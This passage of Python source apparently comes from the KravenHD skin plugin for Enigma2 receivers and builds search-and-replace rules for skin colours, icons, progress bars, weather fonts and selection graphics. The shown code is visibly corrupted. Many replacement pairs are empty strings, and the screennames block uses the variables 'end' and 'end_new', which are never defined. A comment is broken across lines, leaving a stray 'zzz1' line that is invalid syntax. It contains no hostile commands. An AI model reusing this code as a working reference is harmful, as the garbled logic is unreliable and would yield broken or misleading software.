config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"none\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### ChannelSelection 'not available' Font\n\t\tself.skinSearchAndReplace.append(['name=\"KravenNotAvailable\" value=\"#00FFEA04', 'name=\"KravenNotAvailable\" value=\"#00' + config.plugins.KravenHD.ChannelSelectionServiceNA.value])\n\n\t\t### GraphicalEPG colors\n\t\tself.skinSearchAndReplace.append(['name=\"KravenGMESelFg\" value=\"#00ffffff', 'name=\"KravenGMESelFg\" value=\"#00' + config.plugins.KravenHD.GMESelFg.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenGMESelBg\" value=\"#00389416', 'name=\"KravenGMESelBg\" value=\"#00' + config.plugins.KravenHD.GMESelBg.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenGMENowFg\" value=\"#00F0A30A', 'name=\"KravenGMENowFg\" value=\"#00' + config.plugins.KravenHD.GMENowFg.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenGMENowBg\" value=\"#00389416', 'name=\"KravenGMENowBg\" value=\"#00' + config.plugins.KravenHD.GMENowBg.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenGMEBorder\" value=\"#00ffffff', 'name=\"KravenGMEBorder\" value=\"#00' + config.plugins.KravenHD.GMEBorder.value])\n\n\t\t### Icons\n\t\tif config.plugins.KravenHD.IBColor.value == \"only-infobar\":\n\t\t\tif config.plugins.KravenHD.IconStyle2.value == \"icons-dark2\":\n\t\t\t\tself.skinSearchAndReplace.append([\"/global-icons/\", \"/icons-dark/\"])\n\t\t\t\tself.skinSearchAndReplace.append([\"/infobar-global-icons/\", \"/icons-dark/\"])\n\t\t\telif config.plugins.KravenHD.IconStyle2.value == \"icons-light2\":\n\t\t\t\tself.skinSearchAndReplace.append([\"/global-icons/\", \"/icons-light/\"])\n\t\t\t\tself.skinSearchAndReplace.append([\"/infobar-global-icons/\", \"/icons-light/\"])\n\t\t\tif config.plugins.KravenHD.IconStyle.value == \"icons-dark\":\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIcon\" value=\"#00fff0e0\"', 'name=\"KravenIcon\" value=\"#00000000\"'])\n\t\t\t\tself.skinSearchAndReplace.append([\"infobar-icons\", \"icons-dark\"])\n\t\t\telif config.plugins.KravenHD.IconStyle.value == \"icons-light\":\n\t\t\t\tself.skinSearchAndReplace.append([\"infobar-icons\", \"icons-light\"])\n\t\telif config.plugins.KravenHD.IBColor.value == \"all-screens\":\n\t\t\tif config.plugins.KravenHD.IconStyle2.value == \"icons-dark2\":\n\t\t\t\tself.skinSearchAndReplace.append([\"/global-icons/\", \"/icons-dark/\"])\n\t\t\telif config.plugins.KravenHD.IconStyle2.value == \"icons-light2\":\n\t\t\t\tself.skinSearchAndReplace.append([\"/global-icons/\", \"/icons-light/\"])\n\t\t\tif config.plugins.KravenHD.IconStyle.value == \"icons-dark\":\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIcon\" value=\"#00fff0e0\"', 'name=\"KravenIcon\" value=\"#00000000\"'])\n\t\t\t\tself.skinSearchAndReplace.append([\"infobar-icons\", \"icons-dark\"])\n\t\t\t\tself.skinSearchAndReplace.append([\"/infobar-global-icons/\", \"/icons-dark/\"])\n\t\t\telif config.plugins.KravenHD.IconStyle.value == 
\"icons-light\":\n\t\t\t\tself.skinSearchAndReplace.append([\"infobar-icons\", \"icons-light\"])\n\t\t\t\tself.skinSearchAndReplace.append([\"/infobar-global-icons/\", \"/icons-light/\"])\n\n\t\tconsole2 = eConsoleAppContainer()\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.IconStyle2.value == \"icons-light2\":\n\t\t\t\tconsole2.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/HD/icons-white.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\t\telse:\n\t\t\t\tconsole2.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/HD/icons-black.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\telse:\n\t\t\tif config.plugins.KravenHD.IconStyle2.value == \"icons-light2\":\n\t\t\t\tconsole2.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/FHD/icons-white.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\t\telse:\n\t\t\t\tconsole2.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/FHD/icons-black.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\n\t\t### Weather-Server\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.WeatherView.value == \"meteo\":\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"50,50\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"50,50\" render=\"Label\" font=\"Meteo; 40\" halign=\"right\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"50,50\" path=\"WetterIcons\" render=\"KravenHDWetterPicon\" alphatest=\"blend\"', 'size=\"50,50\" render=\"Label\" font=\"Meteo; 45\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"70,70\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"70,70\" render=\"Label\" font=\"Meteo; 60\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"100,100\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"100,100\" render=\"Label\" font=\"Meteo; 1000\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['\"KravenHDWeather\">icon', '\"KravenHDWeather\">meteo'])\n\t\telse:\n\t\t\tif config.plugins.KravenHD.WeatherView.value == \"meteo\":\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"75,75\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"75,75\" render=\"Label\" font=\"Meteo;60\" halign=\"right\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"75,75\" path=\"WetterIcons\" render=\"KravenHDWetterPicon\" alphatest=\"blend\"', 'size=\"75,75\" render=\"Label\" font=\"Meteo;67\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"105,105\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"105,105\" render=\"Label\" font=\"Meteo;90\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"150,150\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"150,150\" render=\"Label\" font=\"Meteo;1500\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" 
noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['\"KravenHDWeather\">icon', '\"KravenHDWeather\">meteo'])\n\n\t\t### Meteo-Font\n\t\tif config.plugins.KravenHD.MeteoColor.value == \"meteo-dark\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenMeteo\" value=\"#00fff0e0\"', 'name=\"KravenMeteo\" value=\"#00000000\"'])\n\n\t\t### Selection Style\n\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"custom\":\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_28.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_32.png\"', \" \"])\n\t\tif config.plugins.KravenHD.SelectionStyle.value == \"color\":\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_CS.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_MS.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_ES.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_ESM.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_30.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_36.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_40.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_45.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_50.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_53.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_60.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_70.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_75.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_90.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_110.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_135.png\"', \" \"])\n\t\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"global\":\n\t\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_28.png\"', \" \"])\n\t\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_32.png\"', \" \"])\n\t\telse:\n\t\t\t# ChannelSelection\n\t\t\tCSitems = config.usage.serviceitems_per_page.value\n\t\t\tCSheight = \"\"\n\t\t\tCSlines = \"\"\n\t\t\tif config.usage.servicelist_twolines.value == True:\n\t\t\t\tCSlines = 2\n\t\t\telse:\n\t\t\t\tCSlines = 1\n\t\t\tif self.actChannelselectionstyle in (\"channelselection-style-nobile-minitv\", \"channelselection-style-nobile-minitv3\", \"channelselection-style-nobile-minitv33\"):\n\t\t\t\tCSheight = 348\n\t\t\telif self.actChannelselectionstyle in (\"channelselection-style-nobile\", \"channelselection-style-nobile2\"):\n\t\t\t\tCSheight = 580\n\t\t\telif self.actChannelselectionstyle == \"channelselection-style-minitv2\":\n\t\t\t\tCSheight = 420\n\t\t\telif self.actChannelselectionstyle == \"channelselection-style-minitv-picon\":\n\t\t\t\tCSheight = 396\n\t\t\telse:\n\t\t\t\tCSheight = 560\n\t\t\tself.actCSItemHeight = int(((CSheight / CSitems) * CSlines) +1)\n\n\t\t\t# 
MovieSelection\n\t\t\tMSitems = config.movielist.itemsperpage.value\n\t\t\tif (MSitems <= 8):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_MS.png', 'sel_90.png'])\n\t\t\tif (9 <= MSitems <= 11):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_MS.png', 'sel_60.png'])\n\t\t\tif (12 <= MSitems <= 14):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_MS.png', 'sel_45.png'])\n\t\t\tif (15 <= MSitems <= 17):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_MS.png', 'sel_36.png'])\n\t\t\tif (18 <= MSitems):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_MS.png', 'sel_30.png'])\n\n\t\t\t# EPGSelection\n\t\t\tESitems = config.epgselection.enhanced_itemsperpage.value\n\t\t\tif (ESitems <= 10):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ES.png', 'sel_70.png'])\n\t\t\tif (11 <= ESitems <= 13):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ES.png', 'sel_45.png'])\n\t\t\tif (14 <= ESitems <= 16):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ES.png', 'sel_36.png'])\n\t\t\tif (17 <= ESitems):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ES.png', 'sel_30.png'])\n\n\t\t\t# EPGSelectionMulti\n\t\t\tESMitems = config.epgselection.multi_itemsperpage.value\n\t\t\tif (ESMitems <= 10):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ESM.png', 'sel_70.png'])\n\t\t\tif (11 <= ESMitems <= 13):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ESM.png', 'sel_45.png'])\n\t\t\tif (14 <= ESMitems <= 16):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ESM.png', 'sel_36.png'])\n\t\t\tif (17 <= ESMitems):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ESM.png', 'sel_30.png'])\n\n\t\t### Progress\n\t\tif not config.plugins.KravenHD.Progress.value == \"progress\":\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress18.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' picServiceEventProgressbar=\"KravenHD/progress/progress52.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress170.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress248.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress270.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress300.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress328.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress380.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress410.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress480.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress657.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress736.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress990.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress1265.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenProgress\" value=\"#00C3461B', 'name=\"KravenProgress\" value=\"#00' + config.plugins.KravenHD.Progress.value])\n\n\t\t### Infobar Progress\n\t\tif not config.plugins.KravenHD.IBProgress.value == \"progress\":\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress581.png\"', \" \"]) # zz2, zz3\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress657_2.png\"', \" \"]) # zz1, 
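zzz1\n\t\t\t# NOTE: makeProgressBackground() in the next block renders each background\n\t\t\t# 20 px wider than its bar pixmap (581->601, 657->677, 749->769, 858->878,\n\t\t\t# 977->997), one per infobar style: zz2/zz3, player, nopicon, x/z and zz1/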
zzz1\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress749.png\"', \" \"]) # x1, x2, x3, z1, z2, timeshift\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress858.png\"', \" \"]) # player\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress977.png\"', \" \"]) # nopicon\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBProgress\" value=\"#00000000', 'name=\"KravenIBProgress\" value=\"#00' + config.plugins.KravenHD.IBProgress.value])\n\n\t\t### Infobar Progress Background\n\t\tif config.plugins.KravenHD.IBProgressBackgroundList.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', '\"blend\" /> -->'])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['', '\"blend\" />'])\n\t\t\tself.makeProgressBackground(878, config.plugins.KravenHD.IBProgressBackground.value, \"progress_bg_pl\") # player\n\t\t\tself.makeProgressBackground(769, config.plugins.KravenHD.IBProgressBackground.value, \"progress_bg_ts\") # x1, x2, x3, z1, z2, timeshift\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-nopicon\":\n\t\t\t\tself.makeProgressBackground(997, config.plugins.KravenHD.IBProgressBackground.value, \"progress_bg_np\") # nopicon\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\t\tself.makeProgressBackground(677, config.plugins.KravenHD.IBProgressBackground.value, \"progress_bg_zz1\") # zz1, zzz1\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\tself.makeProgressBackground(601, config.plugins.KravenHD.IBProgressBackground.value, \"progress_bg_zz2\") # zz2, zz3\n\n\t\t### Infobar Progress Border/line\n\t\tif config.plugins.KravenHD.IBProgressBorderLine.value == \"ib-progress-border\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBProgressBorderLine\" value=\"#00000000', 'name=\"KravenIBProgressBorderLine\" value=\"#00' + config.plugins.KravenHD.IBProgressBorderLineColor.value])\n\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBProgressBorderLine\" zPosition=\"2\"', 'backgroundColor=\"KravenIBProgressBorderLine\" zPosition=\"-99\"'])\n\t\telif config.plugins.KravenHD.IBProgressBorderLine.value == \"ib-progress-line\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBProgressBorderLine\" value=\"#00000000', 'name=\"KravenIBProgressBorderLine\" value=\"#00' + config.plugins.KravenHD.IBProgressBorderLineColor.value])\n\t\t\tself.skinSearchAndReplace.append(['borderColor=\"KravenIBProgressBorderLine\" borderWidth=\"1\"', ' '])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBProgressBorderLine\" zPosition=\"2\"', 'backgroundColor=\"KravenIBProgressBorderLine\" zPosition=\"-99\"'])\n\t\t\tself.skinSearchAndReplace.append(['borderColor=\"KravenIBProgressBorderLine\" borderWidth=\"1\"', ' '])\n\n\t\t### Border\n\t\tself.skinSearchAndReplace.append(['name=\"KravenBorder\" value=\"#00ffffff', 'name=\"KravenBorder\" value=\"#00' + config.plugins.KravenHD.Border.value])\n\n\t\t### MiniTV Border\n\t\tself.skinSearchAndReplace.append(['name=\"KravenBorder2\" value=\"#003F3F3F', 'name=\"KravenBorder2\" value=\"#00' + config.plugins.KravenHD.MiniTVBorder.value])\n\n\t\t### NumberZap Border\n\t\tif not config.plugins.KravenHD.NumberZapExt.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenNZBorder\" value=\"#00ffffff', 'name=\"KravenNZBorder\" value=\"#00' + 
config.plugins.KravenHD.NZBorder.value])\n\n\t\t### Line\n\t\tself.skinSearchAndReplace.append(['name=\"KravenLine\" value=\"#00ffffff', 'name=\"KravenLine\" value=\"#00' + config.plugins.KravenHD.Line.value])\n\n\t\t### Runningtext\n\t\tif config.plugins.KravenHD.RunningText.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append([\"movetype=running\", \"movetype=none\"])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append([\"startdelay=5000\", config.plugins.KravenHD.RunningText.value])\n\n\t\t\t# vertical RunningText\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tself.skinSearchAndReplace.append([\"steptime=90\", config.plugins.KravenHD.RunningTextSpeed.value])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append([\"steptime=90\", config.plugins.KravenHD.RunningTextSpeed2.value])\n\n\t\t\t# horizontal RunningText\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=200\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=66\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=100\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=33\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=66\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=22\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=50\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=17\"])\n\t\t\telse:\n\t\t\t\tif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=200\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=66\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=100\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=33\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=50\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=17\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=33\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=11\"])\n\n\t\t### Scrollbar\n\t\tif config.plugins.KravenHD.ScrollBar.value == \"on\":\n\t\t\tself.skinSearchAndReplace.append(['scrollbarMode=\"showNever\"', 'scrollbarMode=\"showOnDemand\"'])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['scrollbarMode=\"showOnDemand\"', 'scrollbarMode=\"showNever\"'])\n\t\t\t\t\t\n\t\t### Scrollbar - showNever\n\t\tself.skinSearchAndReplace.append(['scrollbarMode=\"never\"', 'scrollbarMode=\"showNever\"'])\n\n\t\t### ibar invisible\n\t\tif config.plugins.KravenHD.IBColor.value == \"only-infobar\":\n\t\t\tself.skinSearchAndReplace.append(['foregroundColor=\"KravenIBGFont1\"', 'foregroundColor=\"KravenFont1\"']) # IB font 1 -> global font 1\n\t\t\tself.skinSearchAndReplace.append(['foregroundColor=\"KravenIBGFont2\"', 'foregroundColor=\"KravenFont2\"']) # IB font 2 -> global font 2\n\t\t\tself.skinSearchAndReplace.append(['', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['', \" \"])\n\n\t\t### Menu\n\t\tif config.plugins.KravenHD.IBColor.value == \"all-screens\":\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', 
''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### MediaPortal IB style\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\tif config.plugins.KravenHD.IBColor.value == \"all-screens\":\n\t\t\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Tuner\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-x2\", \"infobar-style-z1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\n\t\t\t### Tuner Colors\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenTunerBusy\" value=\"#00CCCC00', 'name=\"KravenTunerBusy\" value=\"#00' + config.plugins.KravenHD.TunerBusy.value])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenTunerLive\" value=\"#0000B400', 'name=\"KravenTunerLive\" value=\"#00' + config.plugins.KravenHD.TunerLive.value])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenTunerRecord\" value=\"#00FF0C00', 'name=\"KravenTunerRecord\" value=\"#00' + config.plugins.KravenHD.TunerRecord.value])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenTunerXtremeBusy\" value=\"#001BA1E2', 'name=\"KravenTunerXtremeBusy\" value=\"#00' + config.plugins.KravenHD.TunerXtremeBusy.value])\n\n\t\t\t### Show unused Tuners\n\t\t\tif config.plugins.KravenHD.ShowUnusedTuner.value == \"none\":\n\t\t\t\tself.skinSearchAndReplace.append([',ShowUnused', ''])\n\n\t\t\t### Set align for Tuners\n\t\t\tif not config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\":\n\t\t\t\tself.skinSearchAndReplace.append([',RightAlign2', ''])\n\t\t\t\tself.skinSearchAndReplace.append([',RightAlign4', ''])\n\t\t\t\tself.skinSearchAndReplace.append([',RightAlign8', ''])\n\n\t\t### SecondInfobar Textsize\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tHSize_list = [270, 300, 330, 390, 450]\n\t\t\tEventNowLineHeight = 30\n\t\telse:\n\t\t\tHSize_list = [405, 450, 495, 585, 675]\n\t\t\tEventNowLineHeight = 45\n\n\t\tfor i in HSize_list:\n\t\t\tHSize_old = str(i)\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\"):\n\t\t\t\tHSize_new = str(i - EventNowLineHeight)\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\tHSize_new = str(i - (EventNowLineHeight * 2))\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value 
== \"infobar-style-zzz1\":\n\t\t\t\tHSize_new = str(i - (EventNowLineHeight * 4))\n\t\t\telse:\n\t\t\t\tHSize_new = str(i)\n\n\t\t\tself.skinSearchAndReplace.append([',' + HSize_old + '\" name=\"KravenEventNowHeight\"', ',' + HSize_new + '\"'])\n\n\t\t### Clock Analog Color\n\t\tif self.actClockstyle == \"clock-analog\":\n\t\t\tself.changeColor(\"analogclock\", \"analogclock\", config.plugins.KravenHD.AnalogColor.value, None)\n\n\t\t### Horizontal Menu Icon\n\t\tself.makeHorMenupng(config.plugins.KravenHD.MainmenuHorIconColor.value, self.skincolorbackgroundcolor)\n\n\t\t### Screennames\n\t\tif config.plugins.KravenHD.DebugNames.value == \"screennames-on\":\n\t\t\tbegin = ''\n\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tbegin_new = ''\n\t\t\telse:\n\t\t\t\tbegin_new = ''\n\n\t\t\tself.skinSearchAndReplace.append([begin, begin_new])\n\t\t\tself.skinSearchAndReplace.append([end, end_new])\n\n\t\t### KravenIconVPosition\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tVPos_list = [23, 680, 687, 690, 692]\n\t\telse:\n\t\t\tVPos_list = [34, 1020, 1030, 1035, 1038]\n\n\t\tfor i in VPos_list:\n\t\t\tVPos_old = str(i)\n\t\t\tif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition-3\":\n\t\t\t\tVPos_new = str(i -3)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition-2\":\n\t\t\t\tVPos_new = str(i -2)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition-1\":\n\t\t\t\tVPos_new = str(i -1)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == 